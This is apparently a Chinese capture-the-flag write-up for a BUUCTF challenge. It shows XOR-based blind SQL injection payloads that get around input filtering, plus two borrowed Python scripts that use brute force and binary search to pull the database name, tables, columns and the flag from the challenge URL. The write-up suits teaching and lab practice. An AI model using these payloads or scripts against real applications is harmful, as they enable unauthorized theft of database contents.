输入1-4都是可以的,从5开始就不存在了
多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了
但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists
尝试一下异或注入
输入1^0正确,1^错误,说明是异或注入
1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1
这是正确的结果
错误的结果是这样的
通过这个可以最终得到flag
别人的脚本(现在还不会写)
纯爆脚本
import requests
import time
if __name__ == '__main__':
url='http://3d4099b4-ada7-4531-b403-a98484bee6fd.node4.buuoj.cn:81/?stunum='
result=''
for i in range(1,500):#外循环控制位数
for j in range(31,129):#内循环控制逻辑
payload1='1^if(ascii(substr(database(),{},1))={},1,0)'.format(i,j)
payload2='1^if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'.format(i,j)
payload3='1^if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="flag"),{},1))={},1,0)'.format(i,j)
payload4='1^if(ascii(substr((select(value)from(flag)),{},1))={},1,0)'.format(i,j)
response=requests.get(url+payload4)
print(payload4+" "+str(response.status_code))
time.sleep(0.1)
if "exists" in response.text:
result+=chr(j)
print(result)
break
if j==128:
print("All is end"+result)
break
二分法脚本
import requests
import time
url= 'http://3d4099b4-ada7-4531-b403-a98484bee6fd.node4.buuoj.cn:81/'
database =""
payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#表名为flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名为flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
low = 32
high = 128
mid =(low + high) // 2
while(low < high):
# payload = payload1.format(i,mid) #查库名
# payload = payload2.format(i,mid) #查表名
# payload = payload3.format(i,mid) #查列名
payload = payload4.format(i,mid) #查flag
new_url = url + payload
r = requests.get(new_url)
time.sleep(0.1)
print(new_url)
if "Hi admin, your score is: 100" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) //2
if (mid == 32 or mid == 132):
break
database +=chr(mid)
print(database)
print(database)